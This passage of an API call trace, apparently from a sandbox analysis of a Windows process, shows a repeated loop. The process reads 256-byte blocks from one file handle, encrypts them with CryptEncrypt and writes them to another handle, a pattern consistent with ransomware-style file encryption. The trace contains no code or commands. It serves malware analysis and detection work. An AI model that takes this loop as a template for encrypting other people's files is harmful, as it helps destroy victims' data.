hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.455] GetLastError () returned 0x0 [0153.455] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.455] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.455] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.455] GetLastError () returned 0x0 [0153.455] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.455] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.455] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.455] GetLastError () returned 0x0 [0153.455] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.455] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.455] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.455] GetLastError () returned 0x0 [0153.455] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.455] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.455] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.455] GetLastError () returned 0x0 [0153.455] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.455] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.455] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.455] GetLastError () returned 0x0 [0153.455] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.455] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.456] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.456] GetLastError () returned 0x0 [0153.456] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.456] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.456] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.456] GetLastError () returned 0x0 [0153.456] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.456] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.456] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.456] GetLastError () returned 0x0 [0153.456] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.456] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.456] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.456] GetLastError () returned 0x0 [0153.456] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.456] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.456] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.456] GetLastError () returned 0x0 [0153.456] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.456] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.456] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.456] GetLastError () returned 0x0 [0153.456] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.457] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.457] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.457] GetLastError () returned 0x0 [0153.457] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.457] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.457] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.457] GetLastError () returned 0x0 [0153.457] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.457] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.457] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.457] GetLastError () returned 0x0 [0153.457] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.457] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.457] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.457] GetLastError () returned 0x0 [0153.457] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.457] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.457] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.457] GetLastError () returned 0x0 [0153.457] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.457] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.457] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.457] GetLastError () returned 0x0 [0153.457] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.457] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.458] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.458] GetLastError () returned 0x0 [0153.458] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.458] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.458] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.458] GetLastError () returned 0x0 [0153.458] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.458] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.458] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.458] GetLastError () returned 0x0 [0153.458] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.458] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.458] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.458] GetLastError () returned 0x0 [0153.458] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.458] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.458] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.458] GetLastError () returned 0x0 [0153.458] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.458] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.458] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.458] GetLastError () returned 0x0 [0153.458] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.458] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.458] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.458] GetLastError () returned 0x0 [0153.459] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.459] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.459] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.459] GetLastError () returned 0x0 [0153.459] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.459] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.459] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.459] GetLastError () returned 0x0 [0153.459] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.459] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.459] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.459] GetLastError () returned 0x0 [0153.459] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.459] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.459] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.459] GetLastError () returned 0x0 [0153.459] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.459] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.459] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.459] GetLastError () returned 0x0 [0153.459] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.459] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.459] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.459] GetLastError () returned 0x0 [0153.459] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.459] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.460] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.460] GetLastError () returned 0x0 [0153.460] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.460] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.460] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) 